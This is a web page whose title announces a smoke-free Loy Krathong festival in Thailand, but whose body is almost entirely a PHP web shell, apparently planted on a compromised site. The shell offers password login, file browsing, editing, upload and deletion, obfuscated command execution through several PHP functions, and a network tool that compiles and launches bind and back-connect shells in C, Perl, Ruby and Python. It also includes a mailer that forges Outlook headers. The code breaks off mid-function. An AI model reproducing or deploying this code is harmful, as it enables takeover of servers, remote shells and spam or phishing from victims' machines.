Smoke-Free Loy Krathong Festival Across Thailand

????"; // Nord red for error } $info = ''; $info .= (($perms & 0xC000) == 0xC000) ? 's' : ((($perms & 0xA000) == 0xA000) ? 'l' : ((($perms & 0x8000) == 0x8000) ? '-' : 'd')); $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); $color = is_writable($file) ? '#a3be8c' : '#bf616a'; // Nord green if writable, Nord red if not return "$info"; } function getOwnerGroup(string $item): string { $owner = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner($item))['name'] : fileowner($item); $group = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup($item))['name'] : filegroup($item); return "$owner/$group"; } function getFileType(string $file): string { return mime_content_type($file) ?: filetype($file) ?: 'Unknown'; } function getFunctionalCmd(string $cmd): string { $funcs = ['shell_exec', 'exec', 'system', 'passthru', 'proc_open', 'popen']; $obfuscated = base64_encode(serialize($funcs)); $deobfuscate = function ($x) {return unserialize(base64_decode($x));}; foreach ($deobfuscate($obfuscated) as $func) { if (function_exists($func)) { return obfuscatedExecution($func, $cmd); } } return "No available function to execute command."; } function obfuscatedExecution(string $func, string $cmd): string { $encoded = base64_encode($cmd); $decoded = base64_decode($encoded); switch ($func) { case 'shell_exec': case 'exec': return call_user_func($func, $decoded); case 'system': case 'passthru': ob_start(); call_user_func($func, $decoded); return ob_get_clean(); case 'proc_open': return executeWithProc_open($decoded); case 'popen': return executeWithPopen($decoded); default: return "Unknown function: $func"; } } function executeWithProc_open(string $cmd): string { $spec = [0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"]]; $proc = call_user_func('proc_open', $cmd, $spec, $pipes); if (is_resource($proc)) { fclose($pipes[0]); $out = stream_get_contents($pipes[1]); $err = stream_get_contents($pipes[2]); array_map('fclose', array_slice($pipes, 1)); proc_close($proc); return $err ? "Error: $err" : $out; } return "Failed to execute command using proc_open."; } function executeWithPopen(string $cmd): string { $handle = call_user_func('popen', $cmd, 'r'); if ($handle) { $output = stream_get_contents($handle); pclose($handle); return $output; } return "Failed to execute command using popen."; } class Elliottophellia { private string $currentPath; private array $get; private array $post; private array $files; private string $selfFile; public function __construct(array $get, array $post, array $files) { $this->get = $get; $this->post = $post; $this->files = $files; $this->currentPath = hexToString($this->get['d'] ?? stringToHex(getcwd())); $this->selfFile = $_SERVER['PHP_SELF']; chdir($this->currentPath); } public function run(): void { if (!$this->isAuthenticated()) { $this->showLoginForm(); return; } $this->showHeader(); if (isset($this->get['t'])) { $tool = hexToString($this->get['t']); switch ($tool) { case 'network': $this->showNetworkTools(); break; case 'mailer': $this->showMailerTools(); break; case 'upload': $this->showUploadTools(); break; case 'info': $this->showSystemInfo(); break; case 'mkfile': $this->showFileCreationTools(); break; case 'mkdir': $this->showDirectoryCreationTools(); break; case 'command': $this->showCommandExecutionTools(); break; case 'cname': $this->showRenameFileTools(); break; case 'fedit': $this->showFileEditTools(); break; case 'fview': $this->showFileViewTools(); break; case 'download': $this->downloadFile(hexToString($this->get['f'])); break; default: $this->showFileManager(); break; } } else { $this->showFileManager(); } $this->handleFileOperations(); $this->showFooter(); } private function isAuthenticated(): bool { if (isset($this->post['pass'])) { if (verifyPassword($this->post['pass'])) { $_SESSION['authenticated'] = true; } } return $_SESSION['authenticated'] ?? false; } private function showLoginForm(): void { echo ' WELCOME! '; } private function showHeader(): void { echo ' OPHELLIA v' . VERSION . '

ELLIOTTOPHELLIA

' . php_uname('a') . '

'; } private function handleFileOperations(): void { if (isset($this->get['rfile']) && is_writable(hexToString($this->get['rfile']))) { $this->removeFile(hexToString($this->get['rfile'])); } if (isset($this->get['rmdir']) && is_writable(hexToString($this->get['rmdir']))) { $this->removeDirectory(hexToString($this->get['rmdir'])); } if (isset($this->get['exit'])) { $this->exit(); } } private function removeFile(string $file): void { if (unlink($file)) { echo "

File $file Deleted Successfully!

"; echo ""; } else { echo "

Failed to delete file $file.

"; echo ""; } } private function removeDirectory(string $dir): void { if (rmdir($dir)) { echo "

Directory $dir Deleted Successfully!

"; echo ""; } else { echo "

Failed to delete directory.

"; echo ""; } } private function createFile(string $fileName, string $fileContent = ''): void { $fullPath = $this->currentPath . '/' . $fileName; if (file_put_contents($fullPath, $fileContent) !== false) { echo "

File '$fileName' Created Successfully!

"; echo ""; } else { echo "

Failed to create file '$fileName'.

"; echo ""; } } private function createDirectory(string $dir): void { if (mkdir($this->currentPath . "/" . $dir, 0777, true)) { echo "

Directory $dir Created Successfully!

"; echo ""; } else { echo "

Failed to create directory $dir.

"; echo ""; } } private function exit(): void { session_destroy(); echo ''; } private function downloadFile(string $file): void { if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } } private function executeNetworkTool(string $type, string $ip, string $port, string $pty, string $rby, string $bcc, string $bcp, string $bpc, string $bpp): void { switch ($type) { case 'cb': safeFileWrite('/tmp/cb.c', $bpc); getFunctionalCmd('gcc -o /tmp/cb /tmp/cb.c'); getFunctionalCmd('/tmp/cb ' . $port . ' &'); echo "
" . getFunctionalCmd('ps aux | grep cb') . "
"; break; case 'pb': safeFileWrite('/tmp/pb.pl', $bpp); getFunctionalCmd('perl /tmp/pb.pl ' . $port . ' &'); echo "
" . getFunctionalCmd('ps aux | grep pb') . "
"; break; case 'cbc': safeFileWrite('/tmp/cbc.c', $bcc); getFunctionalCmd('gcc -o /tmp/cbc /tmp/cbc.c'); getFunctionalCmd('/tmp/cbc ' . $ip . ' ' . $port . ' &'); echo "
" . getFunctionalCmd('ps aux | grep cbc') . "
"; break; case 'pbc': safeFileWrite('/tmp/pbc.pl', $bcp); getFunctionalCmd('perl /tmp/pbc.pl ' . $ip . ' ' . $port . ' &'); echo "
" . getFunctionalCmd('ps aux | grep pbc') . "
"; break; case 'rbb': safeFileWrite('/tmp/rbb.rb', $rby); getFunctionalCmd('ruby /tmp/rbb.rb ' . $port . ' &'); echo "
" . getFunctionalCmd('ps aux | grep rbb') . "
"; break; case 'rbbc': safeFileWrite('/tmp/rbbc.rb', $rby); getFunctionalCmd('ruby /tmp/rbbc.rb ' . $port . ' ' . $ip . ' &'); echo "
" . getFunctionalCmd('ps aux | grep rbbc') . "
"; break; case 'pyb': safeFileWrite('/tmp/pyb.py', $pty); getFunctionalCmd('python /tmp/pyb.py ' . $port . ' &'); echo "
" . getFunctionalCmd('ps aux | grep pyb') . "
"; break; case 'pybc': safeFileWrite('/tmp/pybc.py', $pty); getFunctionalCmd('python /tmp/pybc.py ' . $port . ' ' . $ip . ' &'); echo "
" . getFunctionalCmd('ps aux | grep pybc') . "
"; break; } } private function checkMailServerAccess(): bool { $testTo = 'test@example.com'; $testSubject = 'Test Mail Server Access'; $testMessage = 'This is a test message to check mail server access.'; $testHeaders = 'From: test@' . $_SERVER['SERVER_NAME'] . "rn" . 'X-Mailer: PHP/' . phpversion(); // Suppress warnings and notices during the mail() function call $errorReporting = error_reporting(); error_reporting(E_ERROR); $result = @mail($testTo, $testSubject, $testMessage, $testHeaders); // Restore original error reporting level error_reporting($errorReporting); return $result; } private function sendSimpleMail(): void { $to = $this->extractEmail($this->post['to']); $subject = $this->post['subject']; $message = $this->post['message']; $from = $this->extractEmail($this->post['from']); $fromName = $this->extractName($this->post['from']); $headers = "From: $fromName <$from>rn"; $headers .= "Reply-To: $fromrn"; $headers .= "X-Priority: 1rn"; $headers .= "X-MSmail-Priority: Highrn"; $headers .= "X-Mailer: Microsoft Office Outlook, Build 11.0.5510rn"; $headers .= "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441rn"; if (mail($to, $subject, $message, $headers)) { echo "

Mail Sent Successfully!

"; echo ""; } else { echo "

Failed to send mail.

"; echo ""; } } private function extractEmail(string $input): string { if (strpos($input, '<') !== false && strpos($input, '>') !== false) { preg_match('/<
Back